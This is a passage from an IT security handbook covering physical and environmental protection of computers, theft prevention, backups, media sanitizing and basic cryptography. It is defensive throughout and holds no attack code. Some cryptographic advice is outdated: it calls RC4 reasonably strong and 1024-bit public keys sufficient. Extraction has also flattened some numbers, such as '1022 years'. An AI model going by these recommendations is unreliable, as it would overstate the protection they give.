plan a sensitive document: by its very nature, it contains detailed information on your defenses' weakest points. The Disaster Recovery Plan You should also have a plan for immediately securing temporary computer equipment and for loading your backups onto new systems in case your computer is ever stolen or damaged. This plan is known as a disaster recovery plan. It should also include its own security component; even when you're operating at your disaster site or transitioning back to normal operations, it's best to operate securely. You can regularly test parts of this plan by renting or borrowing a computer system and trying to restore your backups. Less frequently, it's a good idea to test the entire plan, to include that your alternative facilities are available and will function when you need them. Other Contingencies Beyond the items mentioned earlier, you may also wish to consider the impact on your operations of the following: Loss of phone service or network connections How will the loss of service impact your regular operations? Vendor continuity How important is support? Can you move to another hardware or software system if your vendor goes out of business or makes changes you don't wish to adopt? Significant absenteeism of staff Will this impact your ability to operate? Death or incapacitation of key personnel Can every member of your computer organization be replaced? What are the contingency plans? Disaster recovery planning efforts should fit into your organization-wide contingency plans. Saving data is often critical, but becomes less useful when you don't have space, power, or tools necessary to continue to operate anyway. Protecting Computer Hardware Physically protecting a computer presents many of the same problems that arise when protecting typewriters, jewelry, and file cabinets. As with a typewriter, an office computer is something that many people inside the office need to access on an ongoing basis. As with jewelry, computers are valuable and generally easy for a thief to sell. As with legal files and financial records, if you don't have a backup--or if the backup is stolen or destroyed along with the computer--the data you have lost may well be irreplaceable. Even if you do have a backup, you will still need to spend valuable time setting up a replacement system. Finally, there is always the chance that the stolen information itself, or even the mere fact that information was stolen, will be used against you. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 211 To make matters worse, computers and computer media are temperamental. A computer's power supply can be blown out simply by leaving the machine plugged into the wall if lightning strikes nearby. There are several measures that you can take to protect your computer system against physical threats. Many of them will simultaneously protect the system from dangers posed by nature, outsiders, and inside saboteurs. Protecting Against Environmental Dangers Computers often require exactly the right balance of physical and environmental conditions to operate properly. Altering this balance can cause your computer to fail in unexpected and often undesirable ways. Even worse, your computer might continue to operate erratically, producing incorrect results and corrupting valuable data. Fire Computers are notoriously bad at surviving fires. You can increase the chances that your computer will be an exception by making sure that there is good fire-extinguishing equipment nearby, and that personnel are trained to use it. Automatic gas discharge systems and dry-pipe water-based sprinkler systems each have advantages and disadvantages that should be carefully considered (PUIS, 198-200) Be sure that your wiring is protected, in addition to your computers. Be certain that smoke detectors and sprinkler heads, if used, are appropriately positioned to cover wires in wiring trays (often above your suspended ceilings) and in wiring closets. Smoke Smoke is very damaging to computer equipment. Smoke is a potent abrasive and collects on the heads of unsealed magnetic disks, optical disks, and tape drives. Sometimes smoke is generated by computers themselves. Electrical fires--particularly those caused by the transformers in video monitors--can produce a pungent, acrid smoke that may damage other equipment and may also be poisonous or a carcinogen. Another significant danger is the smoke that comes from cigarettes and pipes. Install smoke detectors in every room with computer equipment, and be sure to mount them under raised floors and over suspended ceilings as well. Do not permit smoking in your computer room. (PUIS, 200-201) Earthquake Nearly every part of the planet experiences the occasional temblor. While some buildings collapse in an earthquake, most remain standing. Careful attention to the placement of shelves and bookcases in your office can increase the chances that you and your computers will survive all but the worst disasters. Avoid placing computers on any high surfaces or near windows; similarly, avoid placing other heavy objects on PART shelves near computers where they might fall onto your equipment. A good approach is to place computers under strong tables. Also consider physically attaching the computer to the surface on which it is resting. You can use FIVE bolts, tie-downs, straps, or other implements. (This practice also helps deter theft.) 212 IT SECURITY FOR TECHNICAL ADMINISTRATORS Temperature extremes Computers, like people, operate best within certain temperature ranges. Most computer systems should be kept between 10 to 32 degrees Celsius (50 and 90 degrees Fahrenheit). If the ambient temperature around your computer gets too high, the computer cannot adequately cool itself, and internal components can be damaged. If the temperature gets too cold, the system can undergo thermal shock when it is turned on, causing circuit boards or integrated circuits to crack. Once you've determined what temperature ranges your computers can tolerate, maintain those temperatures. Pay particular attention to the heat discharge and air flow patterns of the machines. Use temperature alarms to monitor the ambient temperature. (PUIS, 203-204) Electrical noise Motors, fans, heavy equipment, and even other computers generate electrical noise that can cause intermittent problems with the computer you are using. This noise can be transmitted through space or nearby power lines. Electrical surges are a special kind of electrical noise that consists of one (or a few) high-voltage spikes. If possible, each computer should have a separate electrical circuit with an isolated ground and power filtering equipment; in no cases should a computer share a circuit with heavy equipment. Radio transmitters (including cellular phones) should be kept away from computers. (PUIS, 204-205) Lightning Lightning generates large power surges that can damage even computers with otherwise protected electrical supplies. If lightning strikes your building's metal frame (or hits your building's lightning rod), the resulting current can generate an intense magnetic field on its way to the ground. Computers should be unplugged during lightning storms; if that's not possible, invest in surge suppression devices. Although they won't protect against a direct strike, they can help when storms are distant. Magnetic media should be stored as far as possible from the building's structural steel members. Never run copper network cable outdoors unless it's in a metal conduit. (PUIS, 205) Water Water can destroy your computer. The primary danger is an electrical short, which can happen if water bridges between a circuit board trace carrying voltage and a trace carrying ground. Water usually comes from rain or flooding. Sometimes it comes from an errant sprinkler system. Water also may come from strange places, such as a toilet overflowing on a higher floor, vandalism, or the fire department Keep computers out of basements that are prone to flooding. Mount water sensors on the floor of computer rooms, as well as under raised floors, and use them to automatically cut off power in the event of a flood. Food and drink Food--especially oily food--collects on people's fingers and from there gets on anything that a person touches. Often this includes dirt-sensitive surfaces such as magnetic tapes and optical disks. One of the fastest ways of putting a desktop keyboard out of commission is to pour a soft drink or cup of coffee between the keys. Generally, the simplest rule is the safest: keep all food and drink away from your computer systems.209 209Perhaps more than any other rule in this chapter, this rule is honored most often in the breach. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 213 Other environmental hazards Several other environmental hazards bear consideration: · Dust. Keep computer rooms as dust-free as possible, and use a computer vacuum with a microfilter on a regular basis. (PUIS, 201-202) · Explosion. If you need to operate a computer in an area where there is a risk of explosion, you might consider purchasing a system with a ruggedized case. Backups should be kept in blast-proof vaults or off-site. (PUIS, 203) · Insects. Take active measures to limit the amount of insect life in your machine room. (PUIS, 204) · Vibration. In a high-vibration environment, place computers on a rubber or foam mat if you can do so without blocking ventilation openings. (PUIS, 205-206) · Humidity. Monitor and maintain an appropriate humidity. Environmental monitoring To detect spurious problems, continuously monitor and record your computer room's temperature and relative humidity. As a general rule of thumb, every 1,000 square feet of office space should have its own recording equipment. Log and check recordings on a regular basis. Controlling Physical Access Simple common sense will tell you to keep your computer in a locked room. But how safe is that room? Sometimes a room that appears to be safe is actually wide open. Raised floors and dropped ceilings In many modern office buildings, internal walls do not extend above dropped ceilings or beneath raised floors. This type of construction makes it easy for people in adjoining rooms, and sometimes adjoining offices, to gain access. Entrance through air ducts If the air ducts that serve your computer room are large enough, intruders can use them to gain entrance to an otherwise secured area. Areas that need a lot of ventilation should be served by several small ducts, or should have screened welded over air vents or inside the ducts. In a very high-security environment, motion detectors can be placed inside air ducts. Glass walls Although glass walls and large windows frequently add architectural panache, they can be severe security risks. Glass walls are easy to break; a brick and a bottle of gasoline thrown through a window can cause an incredible amount of damage. An attacker can also gain critical knowledge, such as passwords or information about system operations, simply by watching people on the other side of a glass wall or window. It may even be possible to capture information from a screen by analyzing its reflective glow. Interior glass walls are good for rooms which must be guarded but which the guard is not allowed to enter; in most other cases, avoid them. (PUIS, 208-209) PART Defending Against Vandalism FIVE Computer systems are good targets for vandalism. Reasons for vandalism include revenge, riots, strikes, political or ideological statements, or simply entertainment for the feebleminded. In principle, any part of a computer system--or the building that houses it--may be a target for vandalism. In practice, some targets are more vulnerable than others. 214 IT SECURITY FOR TECHNICAL ADMINISTRATORS Ventilation holes Several years ago, 60 workstations at the Massachusetts Institute of Technology were destroyed in a single evening by a student who poured Coca-Cola into each computer's ventilation holes. Computers that have ventilation holes need them. Don't seal up the holes to prevent this sort of vandalism. However, a rigidly enforced policy against food and drink in the computer room--or a 24-hour guard, in person or via closed-circuit TV--can help prevent this kind of incident from happening at your site. Network cables In many cases, a vandal can disable an entire subnet of workstations by cutting a single wire with a pair of wire cutters. Compared with Ethernet, fiber optic cables are at the same time more vulnerable (they can be more easily damaged), more difficult to repair (they are difficult to splice), and more attractive targets (they often carry more information). "Temporary" cable runs often turn into permanent installations, so take extra time and effort to install cable correctly the first time. One simple method for protecting a network cable is to run it through physically secure locations. For example, Ethernet can be run through steel conduits. Besides protecting against vandalism, this practice protects against some forms of network eavesdropping, and may help protect your cables in the event of a small fire. Fiber optic cable can suffer small fractures if someone steps on it. A fracture of this type is difficult to locate because there is no break in the coating. Some high-security installations use double-walled, shielded conduits with a pressurized gas between the layers. Pressure sensors on the conduit break off all traffic or sound a warning bell if the pressure ever drops, as might occur if someone breached the walls of the pipe. Network connectors In addition to cutting a cable, a vandal who has access to a network's endpoint--a network connector--can electronically disable or damage the network. All networks based on wire are vulnerable to attacks with high voltage. Utility connections In many buildings, electrical, gas, or water cutoffs may be accessible--sometimes even from the outside of the building. Because computers require electrical power, and because temperature control systems may rely on gas heating or water-cooling, these utility connections represent points of attack for a vandal. Defending Against Acts of War and Terrorism Because it is simply impossible to defend against many attacks, devise a system of hot backups and mirrored disks and servers. With a reasonably fast network link, you can arrange for files stored on one computer to be simultaneously copied to another system on the other side of town--or the other side of the world. Sites that cannot afford simultaneous backup can have hourly or nightly incremental dumps made across the network link. Although a tank or suicide bomber may destroy your computer center, your data can be safely protected someplace else. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 215 Preventing Theft Computer theft--especially laptop theft--can be merely annoying or can be an expensive ordeal. But if the computer contains information that is irreplaceable or extraordinarily sensitive, it can be devastating. Many computer systems are stolen for resale--either the complete system or, in the case of sophisticated thieves, the individual components, which are harder to trace. Other computers are stolen by people who cannot afford to purchase their own computers. Still others are stolen for the information that they contain, usually by people who wish to obtain the information but sometimes by those who simply wish to deprive the computer's owner of the use of the information. No matter why a computer is stolen, most computer thefts have one common element: opportunity. In most cases, computers are stolen because they have been left unprotected. Laptops and other kinds of portable computers present a special hazard. They are easily stolen, difficult to tie down (they then cease to be portable!), and easily resold. Personnel with laptops should be trained to be especially vigilant in protecting their computers. In particular, theft of laptops in airports has been reported to be a major problem. Laptops should not be left unattended anywhere, for any period of time. If you're traveling by cab, keep your laptop with you, rather than in the trunk. Fortunately, by following a small number of simple and inexpensive measures, you can dramatically reduce the chance that your laptop or desktop computer will be stolen. Locks One very good way to protect your computer from theft is to physically secure it. A variety of physical tie-down devices are available to bolt computers to tables or cabinets. Although they cannot prevent theft, they make it more difficult. Mobility is one of the great selling points of laptops. It is also the key feature that leads to laptop theft. One of the best ways to decrease the chance of having your laptop stolen is to lock it, at least temporarily, to a desk, a pipe, or another large object. Most laptops sold today are equipped with a security slot. For less than $50 you can purchase a cable lock that attaches to a nearby object and locks into the security slot. Once set, the lock cannot be removed without either using the key or damaging the laptop case, which makes it very difficult to resell the laptop. These locks prevent most grab-and-run laptop thefts. Tagging Another way to decrease the chance of theft and increase the likelihood of return is to etch equipment with your name and phone number or tag it with permanent or semi permanent equipment tags. Tags make it very difficult for potential buyers or sellers to claim that they didn't know that the computer was stolen. PART The best equipment tags are clearly visible and individually serial-numbered, so that an organization can track its property. A low-cost tagging system is manufactured by Secure Tracking of Office Property (http://www.stoptheft.com). These tags are individually serial-numbered and come with a three-year tracking FIVE service in Europe, Australia, Latin America, or North America. If a piece of equipment with a STOP tag is found, the company can arrange to have it sent by overnight delivery back to the original owner. An 800 number on the tag makes returning the property easy. 216 IT SECURITY FOR TECHNICAL ADMINISTRATORS Laptop recovery software and services Several companies now sell PC "tracing" programs. The tracing program hides in several locations on a laptop and places a call to the tracing service on a regular basis to reveal its location. The calls can be made using either a telephone line or an IP connection. Normally these "calls home" are ignored, but if the laptop is reported stolen to the tracing service, the police are notified about the location of the stolen property. Of course, many of these systems work on desktop systems as well as laptops. Thus, you can protect systems that you believe are at a heightened risk of being stolen. Component theft When RAM has been expensive, businesses and universities have suffered a rash of RAM thefts. Many computer businesses and universities have also had major thefts of advanced processor chips. RAM and late-model CPU chips are easily sold on the open market. They are virtually untraceable. And, when thieves steal only some of the RAM inside a computer, weeks or months may pass before the theft is noticed. If a user complains that a computer is suddenly running more slowly than it did the day before, check its RAM, and then check to see that its case is physically secured. Encryption If your computer is stolen, the information it contains will be at the mercy of the equipment's new "owners." They may erase it or they may read it. Sensitive information can be sold, used for blackmail, or used to compromise other computer systems. You can never make something impossible to steal. But you can make stolen information virtually useless-- provided that it is encrypted and the thief does not know the encryption key. For this reason, even with the best computer-security mechanisms and physical deterrents, sensitive information should be encrypted using an encryption system that is difficult to break. We recommend that you acquire and use a strong encryption system so that even if your computer is stolen, the sensitive information it contains will not be compromised. Protecting Your Data There is a strong overlap between the physical security of your computer systems and the confidentiality and integrity of your data. After all, if somebody steals your computer, they probably have your data. Unfortunately, there are many attacks on your data that may circumvent the physical measures mentioned in earlier sections. Eavesdropping Electronic eavesdropping is perhaps the most sinister type of data piracy. Even with modest equipment, an eavesdropper can make a complete transcript of a victim's actions--every keystroke and every piece of information viewed on a screen or sent to a printer. The victim, meanwhile, usually knows nothing of the attacker's presence and blithely goes about his or her work, revealing not only sensitive information but also the passwords and procedures necessary for obtaining even more information. Tools exist for eavesdropping at many points, including the connection between the keyboard and the computer, data cables and wiring, Ethernet and fiber optic networks, wireless networks, and even by analyzing radio emissions from equipment. (PUIS, 216-219) There are several ways to make eavesdropping more difficult: Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 217 · Routinely inspect all cables and wires carrying data for physical damage or modification, and consider using shielded or armored cable to make wiretapping more difficult. If you are very security-conscious, place cable in steel conduit. · Make sure unused offices do not have live Ethernet ports. Use Ethernet switches instead of hubs. Run LAN monitoring software like arpwatch that detects packets with previously unknown MAC addresses, or use switches that can perform MAC address filtering. Use fiber optic cables in preference to twisted-pair networks when possible; they are harder to tap undetected. · Avoid using wireless networks; if you must build a wireless network, enable all possible security features for defense-in-depth (e.g. encryption, firewalling, disabling SSID broadcasts, MAC filters, etc.) Because most of these features provide very little security, educate your users to always use a VPN or other encrypted tunnel for wireless networking. Place the wireless access point outside your firewall (or between two firewalls). · Encryption provides significant protection against eavesdropping. Thus, in many cases, it makes sense to assume that your communications are being monitored and to encrypt all communications as a matter of course. When this is not feasible, at least encrypt all sensitive traffic (such as login names and passwords for remote services). Protecting Backups Backups should be a prerequisite of any computer operation--secure or otherwise--but the information stored on backup tapes is extremely vulnerable. Protect your backups at least as well as you normally protect your computers themselves. Never leave them unattended in a generally accessible area, keep then in physically secure locations (ideally, some in a location away from your computers) and be careful who you trust to ship them from location to location. Most backup programs allow you to encrypt the data before it is written to backup. Encrypted backups dramatically reduce the chance that a backup tape or CD-ROM, if stolen, will be useful to an adversary. If you encrypt backups, be sure you protect the encryption key, both so that an attacker cannot learn it and so that your key will not be lost if you should change staff. Sometimes, backups in archives are slowly erased by environmental conditions. Magnetic tape is also susceptible to a process called print through, in which the magnetic domains on one piece of tape wound on a spool affect the next layer. The only way to find out if this process is harming your backups is to test them periodically. A surprisingly common problem is inadequate labeling and inventorying of backup media. You can choose any system of labeling and cataloging that you find effective, as long as you choose one and document it clearly. Sanitizing Media Before Disposal When you discard disk drives, CD-ROMs, or tapes, make sure that the data on the media has been completely erased. This process is called sanitizing. Simply deleting a file that is on your hard disk doesn't delete the data associated with the file. Parts of the original data--and sometimes entire files--can usually be easily recovered. Hard disks must be sanitized with special PART software that is specially written for each particular disk drive's model number and revision level. FIVE For tapes, you can use a degaussing machine or bulk eraser--a hand-held electromagnet that has a hefty field. Experiment with reading back the information stored on tapes that you have "bulk erased" until you know how much erasing is necessary to eliminate your data. 218 IT SECURITY FOR TECHNICAL ADMINISTRATORS Some software exists to overwrite optical media, thus erasing the contents of even write-once items. However, the effectiveness of these methods varies from media type to media type, and the overwriting may still leave some residues. For this reason, physical destruction may be preferable. Incinerators and acid baths do a remarkably good job of destroying tapes, but are not environmentally friendly. Until recently, crushing was preferred for hard disk drives and disk packs. But as disk densities get higher and higher, disk drives must be crushed into smaller and smaller pieces to frustrate laboratory analysis of the resulting material. Degaussing machines are available for hard drives, but expensive. As a result, physical destruction is losing popularity when compared with software-based techniques. One common sanitizing method involves overwriting the entire disk or tape. If you are dealing with highly confidential or security-related materials, you may wish to overwrite the disk or tape several times, because data can be recovered from tapes that have been overwritten only once. Commonly, tapes are overwritten three times-- once with blocks of 0s, then with blocks of 1s, and then with random numbers. Finally, the tape may be run through a band saw several times to reduce it to thousands of tiny pieces of plastic. Sanitizing Printed Media Printed material that may find its way into the trash may contain information that is useful to criminals or competitors. This includes printouts of software (including incomplete versions), memos, design documents, preliminary code, planning documents, internal newsletters, company phone books, manuals, and other material. Other information that may find its way into your dumpster includes the types and versions of your operating systems and computers, serial numbers, patch levels, and so on. It may include hostnames, IP numbers, account names, and other information critical to an attacker. We have heard of some firms disposing of listings of their complete firewall configuration and filter rules--a gold mine for someone seeking to infiltrate the computers. Consider investing in shredders for each location where information of value might be thrown away. Educate your users not to dispose of sensitive material in their refuse at home, but to bring it in to the office to be shredded. If your organization is large enough and the law allows, you may also wish to incinerate some sensitive paper waste on-site. Protecting Local Storage In addition to computers and mass-storage systems, many other pieces of electrical data-processing equipment store information. For example, terminals, modems, and laser printers often have memory buffers that may be downloaded and uploaded with appropriate control sequences. Naturally, any piece of memory that is used to hold sensitive information presents a security problem, especially if that piece of memory is not protected with a password, encryption, or other similar mechanism. However, the local storage in many devices presents an additional security problem, because sensitive information is frequently copied into such local storage without the knowledge of the computer user. Unattended Terminals Unattended terminals where users have left themselves logged in present a special attraction for vandals (as well as for computer crackers). A vandal can access the person's files with impunity. Alternatively, the vandal can use the person's account as a starting point for launching an attack against the computer system or the entire network: any tracing of the attack will usually point fingers back toward the account's owner, not to the vandal. You should never leave terminals unattended for more than short periods of time. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 219 Some systems or screensavers have the ability to log a user off automatically--or at least to blank his screen and lock his keyboard--when the user's terminal has been idle for more than a few minutes. Take advantage of these features. Key Switches Some kinds of computers have key switches that can be used to prevent the system from being rebooted in single- user mode. Some computers also have ROM monitors that prevent the system from being rebooted in single-user mode without a password. Sun's OpenBoot system and all new Macintosh systems support a password to control boot configuration access. Key switches and ROM monitor passwords provide additional security and should be used when possible.210 However, you should also remember that any computer can be unplugged. The most important way to protect a computer is to restrict physical access to that computer. PART FIVE 210There's another good reason to set ROM monitor passwords. Consider what would happen if an attacker found a machine, set the password himself, and turned it off. 220 IT SECURITY FOR TECHNICAL ADMINISTRATORS CHAPTER 4. INFORMATION SECURITY At a Glance This chapter focuses on mechanisms for protecting information from unwanted exposure, tampering, or destruction. These aspects of security are usually referred to as confidentiality211 ­ preventing unauthorized users from accessing or modifying data and programs ­ and integrity ­ insuring that information and software remain intact and correct. The discussion here is largely conceptual, though examples of the application several principles on actual systems are given. Cryptography Cryptography is a collection of mathematical techniques for protecting information. Using cryptography, you can transform written words and other kinds of messages so that they are unintelligible to anyone who does not possess a specific mathematical key necessary to unlock the message. The process of using cryptography to scramble a message is called encryption. The process of unscrambling the message by use of the appropriate key is called decryption. Cryptography is used to prevent information from being accessed by an unauthorized recipient. In theory, once a piece of information is encrypted, that information can be accidentally disclosed or intercepted by a third party without compromising the security of the information, provided that the key necessary to decrypt the information is not disclosed and that the method of encryption will resist attempts to decrypt the message without the key. In addition to enhancing confidentiality, cryptography has also been used to insure message integrity and non- repudiation. Cryptographic Algorithms and Functions There are fundamentally two kinds of encryption algorithms: Symmetric key algorithms With these algorithms, the same key is used to encrypt and decrypt the message. Symmetric key algorithms are sometimes called secret key algorithms and sometimes called private key algorithms. Unfortunately, both of these names are easily confused with public key algorithms, which are unrelated to symmetric key algorithms. Symmetric key algorithms can be divided into two categories: block and stream. Block algorithms encrypt data a block (many bytes) at a time, while stream algorithms encrypt byte-by-byte (or even bit-by-bit). Asymmetric key algorithms With these algorithms, one key is used to encrypt the message and another key to decrypt it. A particularly important class of asymmetric key algorithms are public key cryptosystems. The encryption key is normally called the public key in these algorithms because it can be made publicly available without compromising the secrecy of the message or the decryption key. The decryption key is normally called the private key or secret key. Symmetric key algorithms are the workhorses of modern cryptographic systems. They are generally much faster than public key algorithms. They are also somewhat easier to implement. And finally, it is generally easier for cryptographers to ascertain the strength of symmetric key algorithms. Unfortunately, symmetric key algorithms have three problems that limit their use in the real world: Or privacy, which is sometimes used interchangeably with confidentiality and sometimes refers more specifically to protecting personally 211 identifiable information about individuals. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 221 · For two parties to securely exchange information using a symmetric key algorithm, those parties must first exchange an encryption key. Exchanging an encryption key in a secure fashion can be quite difficult. · As long as they wish to send or receive messages, both parties must keep a copy of the key, and must keep it safe. If one party's copy is compromised and the second party doesn't know this fact, then the second party might send a message to the first party--and that message could then be subverted using the compromised key. · If each pair of parties wishes to communicate in private, then they need a unique key. This requires (N2 ­ N) / 2 keys for N different users. This number quickly becomes unmanageable. Public key algorithms overcome these problems by separating the encryption and decryption keys. In theory, public key technology makes it relatively easy to send somebody an encrypted message. People who wish to receive encrypted messages will typically publish their public keys in directories or make their keys otherwise readily available. Then, to send somebody an encrypted message, all you have to do is get a copy of her public key, encrypt your message, and send it to her. With a good public key system, you know that the only person who can decrypt the message is the person who has possession of the matching private key. Furthermore, all you really need to store on your own machine is your private key (though it's convenient and unproblematic to have your public key available as well.) Public key cryptography can also be used for creating digital signatures. Like a real signature, a digital signature is used to denote authenticity or intention. For example, you can sign a piece of electronic mail to indicate your authorship in a manner akin to signing a paper letter. And as with signing a bill of sale agreement, you can electronically sign a transaction to indicate that you wish to purchase or sell something. Using public key technology, you use the private key to create the digital signature; others can then use your matching public key to verify the signature. Unfortunately, public key algorithms are computationally expensive. In practice, public key encryption and decryption require as much as 1000 times more computer power than an equivalent symmetric key encryption algorithm. To get both the benefits of public key technology and the speed of symmetric encryption systems, most modern encryption systems actually use a combination: Hybrid public/private cryptosystems With these systems, slower public key cryptography is used to exchange a random session key, which is then used as the basis of a private (symmetric) key algorithm. (A session key is used only for a single encryption session and is then discarded.) Nearly all practical public key cryptography implementations are actually hybrid systems. Finally, there is a special class of functions that are almost always used in conjunction with public key cryptography. These algorithms are not encryption algorithms at all. Instead, they are used to create a "fingerprint" of a file or a key: Message digest functions A message digest function generates a seemingly random pattern of bits for a given input. The digest value is PART computed in such a way that finding a different input that will exactly generate the given digest is computationally infeasible. Message digests are often regarded as fingerprints for files. Most systems that perform digital signatures FIVE encrypt a message digest of the data rather than the actual file data itself. 222 IT SECURITY FOR TECHNICAL ADMINISTRATORS Cryptographic Strength of Symmetric Algorithms Different encryption algorithms are not equal. Some systems are not very good at protecting data, allowing encrypted information to be decrypted without knowledge of the requisite key. Others are quite resistant to even the most determined attack. The ability of a cryptographic system to protect information from attack is called its strength. Strength depends on many factors, including: · The secrecy of the key. · The difficulty of guessing the key or trying out all possible keys (a key search). Longer keys are generally more difficult to guess or find. · The difficulty of inverting the encryption algorithm without knowing the encryption key (breaking the encryption algorithm). · The existence (or lack) of back doors, or additional ways by which an encrypted file can be decrypted more easily without knowing the key. · The ability to decrypt an entire encrypted message if you know the way that a portion of it decrypts (called a known plaintext attack). · The properties of the plaintext and knowledge of those properties by an attacker. For example, a cryptographic system may be vulnerable to attack if all messages encrypted with it begin or end with a known piece of plaintext. In general, cryptographic strength is not proven; it is only disproven. When a new encryption algorithm is proposed, the author of the algorithm almost always believes that the algorithm offers complete security--that is, the author believes there is no way to decrypt an encrypted message without possession of the corresponding key. After all, if the algorithm contained a known flaw, then the author would not propose the algorithm in the first place (or at least would not propose it in good conscience). As part of studying the strength of an algorithm, a mathematician can show that the algorithm is resistant to specific kinds of attacks that have been previously shown to compromise other algorithms. Unfortunately, even an algorithm that is resistant to every known attack is not necessarily secure, because new attacks are constantly being developed. From time to time, some individuals or corporations claim that they have invented new symmetric encryption algorithms that are dramatically more secure than existing algorithms. Generally, these algorithms should be avoided. As there are no known attacks against the encryption algorithms that are in wide use today, there is no reason to use new, unproven encryption algorithms--algorithms that might have flaws lurking in them. Key Length with Symmetric Key Algorithms Short keys can significantly compromise the security of encrypted messages, because an attacker can merely decrypt the message with every possible key so as to decipher the message's content. But while short keys provide comparatively little security, extremely long keys do not necessarily provide significantly more practical security than keys of moderate length. That is, while keys of 40 or 56 bits are not terribly secure, a key of 256 bits does not offer significantly more real security than a key of 168 bits, or even a key of 128 bits. If you are attempting to decrypt a message and do not have a copy of the key, the simplest way to decrypt the message is to do a brute force attack. These attacks are also called key search attacks, because they involve trying every possible key to see if that key decrypts the message. If the key is selected at random, then on average, an attacker will need to try half of all the possible keys before finding the actual decryption key. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 223 Inside a computer, a cryptographic key is represented as a string of binary digits. Each binary digit can be a 0 or a 1. In general, each added key bit doubles the number of keys. So how many bits is enough? That depends on how fast the attacker can try different keys and how long you wish to keep your information secure. If an attacker can try only 10 keys per second, then a 40-bit key will protect a message for more than 3,484 years. Of course, today's computers can try many thousands of keys per second--and with special-purpose hardware and software, they can try hundreds of thousands. Key search speed can be further improved by running the same program on hundreds or thousands of computers at a time. Thus, it's possible to search a million keys per second or more using today's technology. If you have the ability to search a million keys per second, you can try all 40-bit keys in only 13 days. If a key that is 40 bits long is clearly not sufficient to keep information secure, how many bits are necessary? If you could search a billion keys per second, trying all 80-bit keys would still require 38 million years. A 128-bit key search would require 1022 years with current technology, and hundreds of millions of years even with advances in quantum computing. As our Sun is likely to become a red giant within the next 4 billion years and, in so doing, destroy the Earth, a 128-bit encryption key should be sufficient for most cryptographic uses, assuming that there are no other weaknesses in the algorithm used. Common Symmetric Key Algorithms There are many symmetric key algorithms in use today. Some of the algorithms that are commonly encountered in the field of computer security are summarized below; a more complete list of algorithms is in (PUIS, 169-176): DES The Data Encryption Standard was adopted as a U.S. government standard in 1977 and as an ANSI standard in 1981. The DES is a block cipher that uses a 56-bit key and has several different operating modes depending on the purpose for which it is employed. The DES is a strong algorithm, but today the short key length limits its use. Indeed, in 1998 a special-purpose machine for "cracking DES" was created by the Electronic Frontier Foundation (EFF) for under $250,000. In one demonstration, it found the key to an encrypted message in less than a day in conjunction with a coalition of computer users around the world. Triple-DES Triple-DES is a way to make the DES dramatically more secure by using the DES encryption algorithm three times with three different keys, for a total key length of 168 bits. Also called "3DES," this algorithm has been widely used by financial institutions and by the Secure Shell program (ssh). Simply using the DES twice with two different keys does not improve its security to the extent that one might at first suspect because of a theoretical kind of known plaintext attack called meet-in-the-middle, in which an attacker simultaneously attempts encrypting the plaintext with a single DES operation and decrypting the ciphertext with another single DES operation, until a match is made in the middle. Blowfish Blowfish is a fast, compact, and simple block encryption algorithm invented by Bruce Schneier. The algorithm allows a variable-length key, up to 448 bits, and is optimized for execution on 32- or 64-bit processors. The algorithm is unpatented and has been placed in the public domain. Blowfish is used in the Secure Shell and other programs. PART IDEA The International Data Encryption Algorithm (IDEA) was developed in Zurich, Switzerland, by James L. Massey and FIVE Xuejia Lai and published in 1990. IDEA uses a 128-bit key. IDEA is used by the popular program PGP to encrypt files and electronic mail. Unfortunately, wider use of IDEA has been hampered by a series of software patents on the algorithm, which are currently held by Ascom-Tech AG in Solothurn, Switzerland. 224 IT SECURITY FOR TECHNICAL ADMINISTRATORS RC4 This stream cipher was originally developed by Ronald Rivest and kept as a trade secret by RSA Data Security. The algorithm was revealed by an anonymous Usenet posting in 1994 and appears to be reasonably strong. RC4 allows keys between 1 and 2048 bits. Rijndael (AES) This block cipher was developed by Joan Daemen and Vincent Rijmen, and chosen in October 2000 by the National Institute of Standards and Technology to be the United State's new Advanced Encryption Standard. Rijndael is an extraordinarily fast and compact cipher that can use keys that are 128, 192, or 256 bits long. Cryptographers establish the strength of their algorithms through a process of peer review. When an algorithm is published, other cryptographers may look for flaws or weaknesses. Do not trust people who say they've developed a new encryption algorithm, but also say that they don't want to disclose how the algorithm works because such disclosure would compromise the strength of the algorithm. In practice, there is no way to keep an algorithm secret: true security lies in openness. On the other hand, it's important to realize that simply publishing an algorithm or a piece of software does not guarantee that flaws will be found. The WEP (Wired Equivalent Protocol) encryption algorithm used by the 802.11 networking standard was published for many years before a significant flaw was found in the algorithm--the flaw had been there all along, but no one had bothered to look for it. One-Time Pads There is a provably unbreakable symmetric key cryptosystem ­ the one-time pad system. In a one-time pad system, the communicating parties share a key composed of a very long stream of random bytes (longer than the message that is to be sent). The message is encrypted and decrypted by transforming each byte of the message by a byte of the key, after which that key byte is discarded and never used again. Because the key is random and nonrepeating, even a key search attack is infeasible, because every possible message can be produced by some key. Unfortunately, one-time pads have several limitations that make them impractical. In addition to the usual symmetric encryption problems of securely distributing and managing keys, generating large amounts of truly random data is not always straightforward, and distributing large amounts of key material can be difficult. Nevertheless, this system is sometimes used for extremely high-security communications links. Public Key Algorithms Public key algorithms are more difficult to create than symmetric key algorithms, and there are fewer in use. Because the keys of symmetric and asymmetric encryption algorithms are used in fundamentally different ways, it is not possible to infer the relative cryptographic strength of these algorithms by comparing the length of their keys ­ key lengths in public key algorithms typically range from 512 to 2048 or 4096 bits; for most users, 1024 bits are sufficient for the foreseeable future. The following list summarizes the public key systems in common use today: Diffie-Hellman key exchange A system for exchanging cryptographic keys between active parties. Diffie-Hellman is not actually a method of encryption and decryption, but a method of developing and exchanging a shared private key over a public communications channel. In effect, the two parties agree to some common numerical values, and then each party creates a key. Mathematical transformations of the keys are exchanged. Each party can then calculate a third session key that cannot easily be derived by an attacker who knows both exchanged values. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 225 DSA/DSS The Digital Signature Standard (DSS) was developed by the U.S. National Security Agency and adopted as a Federal Information Processing Standard (FIPS) by the National Institute for Standards and Technology. DSS is based on the Digital Signature Algorithm (DSA). Although DSA allows keys of any length, only keys between 512 and 1024 bits are permitted under the DSS FIPS. As specified, DSS can be used only for digital signatures, although it is possible to use some DSA implementations for encryption as well. Elliptic curves Elliptic curve 